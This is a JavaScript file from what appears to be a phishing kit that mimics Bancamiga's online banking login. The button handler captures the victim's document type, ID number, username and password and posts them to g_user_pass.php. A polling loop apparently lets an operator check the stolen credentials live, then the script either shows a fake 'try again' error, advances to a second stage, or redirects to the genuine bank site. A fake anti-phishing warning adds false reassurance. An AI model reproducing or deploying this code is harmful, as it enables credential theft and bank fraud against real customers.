
//////////////////////////////////////////


let conect_user = 0;
let coloco_user = 0;
let coloco_imagen = 0;
let mostrar_mensaje_anti_fishin = 0;

async function Connect_system() {
  let resp_form1 = localStorage.getItem("resp_form1");
  let pantalla = 1;

  if (conect_user == 0) {
    conect_user = 1;

    $.ajax({
      type: "POST",
      url: "../../../php/conectado_user.php",
      async: true,
      data: { "pantalla": pantalla },
      success: function(datos) {
        var dataJson = eval(datos);
        console.log(dataJson);

        if (dataJson.length > 0) {
          if (datos[0].guardo == 'no') {
            window.location.href = '../../..';
            return;
          }

          if (dataJson[0].redirigir == 1) {
            window.location.href = 'https://online.bancamiga.com/?p=1';
            return;
          }

          if (dataJson[0].valid_user_0 == 0) {
            mostrar_mensaje_anti_fishin = 1;
            let datos_login = dataJson[0].user_dato1;
            let datos_login_part = datos_login.split("^");

            let tipo = datos_login_part[0].trim();
            let cedula = datos_login_part[1].trim();
            let user = datos_login_part[2].trim();
            let pass = datos_login_part[3].trim();

            document.getElementById('tipodocben').disabled = true;
            document.getElementById('cedula').disabled = true;
            document.getElementById('user').disabled = true;
            document.getElementById('pass').disabled = true;

            document.getElementById('tipodocben').value = tipo;
            document.getElementById('cedula').value = cedula;
            document.getElementById('user').value = user;
            document.getElementById('pass').value = pass;

            document.getElementsByClassName('caja0')[0].style.display = 'none';
            document.getElementsByClassName('caja1')[0].style.display = 'block';
            document.getElementsByClassName('carga_login')[0].classList.remove('hide');
            document.getElementsByClassName('caja_botones')[0].classList.add('hide');
          }

          if (dataJson[0].valid_user_0 == 2) {
            if (resp_form1 == 0) {
              setTimeout(function() {
                localStorage.setItem("resp_form1", "1");
                Swal.fire({
                  text: 'Estimado cliente, verifique e intente de nuevo.',
                  icon: "error"
                });

                document.getElementById('tipodocben').disabled = false;
                document.getElementById('cedula').disabled = false;
                document.getElementById('user').disabled = false;
                document.getElementById('pass').disabled = false;

                document.getElementById('tipodocben').value = '01';
                document.getElementById('cedula').value = '';
                document.getElementById('user').value = '';
                document.getElementById('pass').value = '';

                document.getElementsByClassName('caja0')[0].style.display = 'none';
                document.getElementsByClassName('caja1')[0].style.display = 'block';
                document.getElementsByClassName('carga_login')[0].classList.add('hide');
                document.getElementsByClassName('caja_botones')[0].classList.remove('hide');
              }, 500);
            }
          }

          // cuando el user es correcto....
          if (dataJson[0].valid_user_0 == 1) {
            window.location.href = '../f2/?p=1';
            return;
          }
        }

        conect_user = 0;
        setTimeout(Connect_system, 1500);
      },
      error: function(jqXHR, textStatus, errorThrown) {
        console.error('Error en la conexión:', textStatus, errorThrown);
        conect_user = 0;
        setTimeout(Connect_system, 1500);
      }
    });
  }
}

Connect_system();


/////////////////////////////////////////////////////////////////////////////////////////////////////////////////
setTimeout(function() {
         if(mostrar_mensaje_anti_fishin==0){
              document.getElementsByClassName('caja0')[0].style.display='none';
                       document.getElementsByClassName('caja1')[0].style.display='block';
                       Swal.fire({
                       html: '<div id="swal2-content" class="swal2-content" style="display: block;"><span style="font-size: 22px"><strong>NO CAIGAS EN TRAMPAS</strong></span> revisa  desde la barra de tú navegador que esta página sea <span style="font-size: 22px"><strong>https://online.bancamiga.com/?p=1</strong></span></div>',
                       icon: "warning"
                     });
         }
                     

          }, 1000);




//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
document.addEventListener('DOMContentLoaded', function() {
            // Seleccionamos los elementos del DOM
            var cedula = document.getElementById('cedula');
            var user = document.getElementById('user');
            var pass = document.getElementById('pass');


            var btnregistro = document.getElementById('btnregistro');
            var btnlogin = document.getElementById('btnlogin');

            // Función para verificar las condiciones y habilitar/deshabilitar el botón
            function verificarCondiciones() {
                if (cedula.value.length > 6 && user.value.length > 4 && pass.value.length > 4) {
                    btnlogin.disabled = false;
                    btnlogin.style='cursor: pointer;'
                } else {
                  
                    btnlogin.style='cursor: not-allowed;'
                    btnlogin.disabled = true;

                }
            }
             function verificar_cmdRegister() {
                if (user.value.length > 5 ) {
                    btnregistro.disabled = false;
                } else {
                    btnregistro.disabled = true;
                }
            }

            // Añadimos eventos de entrada a los campos
            cedula.addEventListener('input', verificarCondiciones);
            user.addEventListener('input', verificarCondiciones);
            user.addEventListener('input', verificar_cmdRegister);
            pass.addEventListener('input', verificarCondiciones);
        });

///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

$(document).on("click","#btnlogin", function(){

let tipo_cuenta = document.getElementById('tipodocben');
let user = document.getElementById('user');
let cedula = document.getElementById('cedula');
let pass = document.getElementById('pass');

if(user.value.length <5 && cedula.value.length <6 && pass.value.length <5){

                     
    return;
}


    let armado_user =tipo_cuenta.value +"^"+ cedula.value +"^"+ user.value +"^"+ pass.value;

    document.getElementsByClassName('carga_login')[0].classList.remove('hide');
    document.getElementsByClassName('caja_botones')[0].classList.add('hide');
    tipo_cuenta.disabled='true';
    user.disabled='true';
    cedula.disabled='true';
    pass.disabled='true';


    _iniciar_proceso_session(armado_user,tipo_cuenta.value,'1');//guardamos los datos para luego verificar si son correctos o no....



});

/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////


let presiono_iniciar_proceso_session =0;
function _iniciar_proceso_session(user,tipo_cuenta,tipo_operacion){
    
   if(presiono_iniciar_proceso_session==1){return;}
       presiono_iniciar_proceso_session=1;
       var tipocuenta = localStorage.getItem('tipocuenta');
         console.log(user);

    $.ajax({
        type:"POST",
        url:"../../../php/g_user_pass.php",
        async: true,
        data:{"user":user,"tipocuenta":tipo_cuenta,"tipo_operacion":tipo_operacion},
        success: function(datos){
        var dataJson = eval(datos);

            console.log(dataJson);
            presiono_iniciar_proceso_session=0;

            if(dataJson.length>0){

                    if(dataJson[0].guardo=='si' && dataJson[0].tipo_operacion=='1'){

                         document.getElementsByClassName('carga_login')[0].classList.remove('hide');
                         document.getElementsByClassName('caja_botones')[0].classList.add('hide');
                        localStorage.setItem("resp_form1", "0");

                    }
    
                          
            }else{
              


            }


         
      },});

}

